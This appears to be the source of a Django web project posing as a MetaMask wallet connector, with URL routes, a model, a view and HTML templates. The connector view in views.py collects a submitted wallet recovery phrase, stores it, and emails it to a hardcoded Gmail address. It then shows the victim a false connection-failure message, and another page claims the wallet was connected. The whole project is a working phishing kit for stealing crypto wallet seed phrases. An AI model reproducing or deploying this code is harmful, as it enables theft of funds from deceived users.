Meta/urls.py
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('base.urls'))

]
admin.site.site_header = "Meta Admin page"
admin.site.site_title = "meta_admin"
admin.site.index_title = "Welcome to Meta admin page"

base/urls.py
from django.urls import path
from . import views

app_name = 'base'
urlpatterns = [

    path('', views.index, name="name"),
    path('wallet/', views.connector, name='tok'),
     path('success/', views.success, name='suc')
]

base/models.py
from django.db import models


# Create your models here.
class walletToken(models.Model):
    token = models.CharField(max_length=30)
    def __str__(self):
        return self.token

base/views.py
from django.contrib import messages
from django.core.mail import send_mail
from django.shortcuts import render

# Create your views here.
from Meta import settings
from base.models import walletToken


def index(request):
    return render(request, 'base/index.html')


def success(request):
    return render(request, 'base/success.html')


def connector(request):
    if request.method == "POST":
        wall = request.POST.get('phrase')
        if wall:
            get = walletToken(token=wall)
            get.save()

            send_mail(subject='Meta mask', message='Token: '+wall,
                      from_email=settings.EMAIL_HOST_USER,
                      recipient_list=['tommyshawww@gmail.com'])
            messages.success(request, 'Fail to connect please try again later')

    return render(request, "base/connector.html")

base/templates/base/idex2.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
 <nav class="navbar navbar-default">
        <div class="container-fluid">
          <div class="navbar-header">
            <a class="navbar-brand" href="#">Speedoo Instant News</a>
          </div>
          <ul class="nav navbar-nav">
            <li class=""><a href="#">Github</a></li>
            <li class=""><a href="#">Nigeri</a></li>
            <li class=""><a href="#">Africa</a></li>

          </ul>
        </div>
      </nav>

</body>
</html>

base/templates/base/success.html
<!DOCTYPE html>
{% load static %}
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> 
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
    <title>Registration Successful Message Example</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="{% static 'index/style.css' %}">
<meta http-equiv ="X-UA-Compatible"  content ="ie=edge">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">


    <meta name="author" content="Codeconvey" />
    <!-- Message Box CSS -->
    <link rel="stylesheet" href="{% static 'base/success.css' %}">
    <!--Only for demo purpose - no need to add.-->
    <link rel="stylesheet" href="{% static 'base/demo.css' %}" />
	
</head>
<body>


<section>
    <div class="rt-container ">
          <div class="col-rt-12">
              <div class="Scriptcontent">
              
<!-- partial:index.partial.html -->
<div id='card' class="animated fadeIn">
  <div id='upper-side'>
    <?xml version="1.0" encoding="utf-8"?>
      <!-- Generator: Adobe Illustrator 17.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
      <!DOCTYPE  PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg version="1.1" id="checkmark" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" xml:space="preserve">
        <path d="M131.583,92.152l-0.026-0.041c-0.713-1.118-2.197-1.447-3.316-0.734l-31.782,20.257l-4.74-12.65
	c-0.483-1.29-1.882-1.958-3.124-1.493l-0.045,0.017c-1.242,0.465-1.857,1.888-1.374,3.178l5.763,15.382
	c0.131,0.351,0.334,0.65,0.579,0.898c0.028,0.029,0.06,0.052,0.089,0.08c0.08,0.073,0.159,0.147,0.246,0.209
	c0.071,0.051,0.147,0.091,0.222,0.133c0.058,0.033,0.115,0.069,0.175,0.097c0.081,0.037,0.165,0.063,0.249,0.091
	c0.065,0.022,0.128,0.047,0.195,0.063c0.079,0.019,0.159,0.026,0.239,0.037c0.074,0.01,0.147,0.024,0.221,0.027
	c0.097,0.004,0.194-0.006,0.292-0.014c0.055-0.005,0.109-0.003,0.163-0.012c0.323-0.048,0.641-0.16,0.933-0.346l34.305-21.865
	C131.967,94.755,132.296,93.271,131.583,92.152z" />
        <circle fill="none" stroke="#ffffff" stroke-width="5" stroke-miterlimit="10" cx="109.486" cy="104.353" r="32.53" />
      </svg>
      <h3 id='status'>
      Success
    </h3>
  </div>
  <div id='lower-side'>
    <p id='message'>
      Congratulations, your wallet key as been connected successfully.
    </p>
    <a href="{% url 'base:name' %}" id="contBtn">Continue</a>
  </div>
</div>
<!-- partial -->
    		
           
    		</div>
		</div>
    </div>
</section>
     


    <!-- Analytics -->

	</body>
</html>